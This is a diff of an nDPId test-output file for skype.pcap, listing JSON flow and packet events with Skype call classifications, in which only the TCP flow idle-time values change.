+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":1431969685234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969685234,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhCdN4KqwKgBIgG7w5jP+27153JQpKASOJApWgAAAgQFrAQCCApOqgmyPiMxhAEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1431969685234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969685234,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0w75AAEAGlVnAqAEinTeCqsOYAbvnclCkz\/tu9oAQECyACwAAAQEICj4jMf1Oqgmy"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1431969685483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969685483,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9kPYAAEARbgbAqAEib91KDDLdnF8AKfx\/nHwCoMStpaQYl8DnkwYEqqAF9FXdbHxKRUYHrOVyJRT4"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -668,12 +668,12 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1431969688514,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969688514,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4ZaYAAEARmVXAqAEib91KEjLdgQkAJLX6nI4C1Tkw7dXubJLsc4XN4Hhz+Cr0PORpW0nsUg=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzR5AAEAGi+rAqAEinTeCrcOanEPZ9P\/0AAAAALAC\/\/+a6AAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1170,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGpxAAEAG1PvAqAEi1cezjsObnEM6Aj3FAAAAALAC\/\/+TmAAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7khAAEAGAdHAqAEinTfrnMOcnE7UANcqAAAAALAC\/\/9gqgAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzR5AAEAGi+rAqAEinTeCrcOanEPZ9P\/0AAAAALAC\/\/+a6AAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1170,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGpxAAEAG1PvAqAEi1cezjsObnEM6Aj3FAAAAALAC\/\/+TmAAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7khAAEAGAdHAqAEinTfrnMOcnE7UANcqAAAAALAC\/\/9gqgAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zvgAAEARklXAqAEiQAQXlzLdnF0AJqz9nJAC1zV5OvO9upQBsUXmJpF2nBcsF0HuRy8JJIUg"} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -683,34 +683,34 @@ 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyo54AAEARi\/LAqAEi1cezmDLdnFcAHjAjnJQCZ2daOJDdnSgXIMa0IqUKO\/m6pw=="} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1175,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1431969689525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689525,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcG+JvVx7OOwKgBIpxDw5sesq08OgI9xqASOJCQMAAAAgQFrAQCCApQDL\/UPiNCegEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1176,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1431969689525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689525,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0n95AAEAGT8XAqAEi1cezjsObnEM6Aj3GHrKtPYAQECznJAAAAQEICj4jQrBQDL\/U"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1178,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1431969689543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689543,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxOw5wzprYh1ADXK6ASOJDpcAAAAgQFrAQCCApMWRmAPiNCegEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1179,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":3,"flow_last_seen":1431969689543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689543,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0irdAAEAGZW7AqAEinTfrnMOcnE7UANcrM6a2IoAQECxAVAAAAQEICj4jQsFMWRmA"} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1431969689596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689596,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYg2dN4KtwKgBIpxDw5oq9Bj82fT\/9aASOJAjJwAAAgQFrAQCCApOp72RPiNCegEDAwk="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":3,"flow_last_seen":1431969689596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689596,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EYdAAEAGR47AqAEinTeCrcOanEPZ9P\/1KvQY\/YAQECx51gAAAQEICj4jQvVOp72R"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1204,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVDVAAEAGBNHAqAEinTeCsMOdnFaE5icqAAAAALAC\/\/\/EvgAAAgQFtAEDAwUBAQgKPiNGZAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1175,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1431969689525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689525,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcG+JvVx7OOwKgBIpxDw5sesq08OgI9xqASOJCQMAAAAgQFrAQCCApQDL\/UPiNCegEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1176,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1431969689525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689525,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0n95AAEAGT8XAqAEi1cezjsObnEM6Aj3GHrKtPYAQECznJAAAAQEICj4jQrBQDL\/U"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1178,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1431969689543,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689543,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxOw5wzprYh1ADXK6ASOJDpcAAAAgQFrAQCCApMWRmAPiNCegEDAwk="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1179,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":3,"flow_last_seen":1431969689543,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689543,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0irdAAEAGZW7AqAEinTfrnMOcnE7UANcrM6a2IoAQECxAVAAAAQEICj4jQsFMWRmA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1431969689596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689596,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYg2dN4KtwKgBIpxDw5oq9Bj82fT\/9aASOJAjJwAAAgQFrAQCCApOp72RPiNCegEDAwk="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":3,"flow_last_seen":1431969689596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689596,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0EYdAAEAGR47AqAEinTeCrcOanEPZ9P\/1KvQY\/YAQECx51gAAAQEICj4jQvVOp72R"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1204,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1204,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVDVAAEAGBNHAqAEinTeCsMOdnFaE5icqAAAAALAC\/\/\/EvgAAAgQFtAEDAwUBAQgKPiNGZAAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAABBoHIAAEARwNrAqAEiQAQXkTLdnFgALcyQnJYCZ5BZSWZ\/iXC28\/gJa4xy6SADRNB7IBe6OkY8K1Ib90nh6Q=="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1205,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969690481,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1206,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1431969690481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969690481,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2TSkAAEARlefAqAEinTc4pTLdnFQAIg\/nnJgCnGl25qOBTIS5Gpv0M8FAGs9\/YbWac7o="} 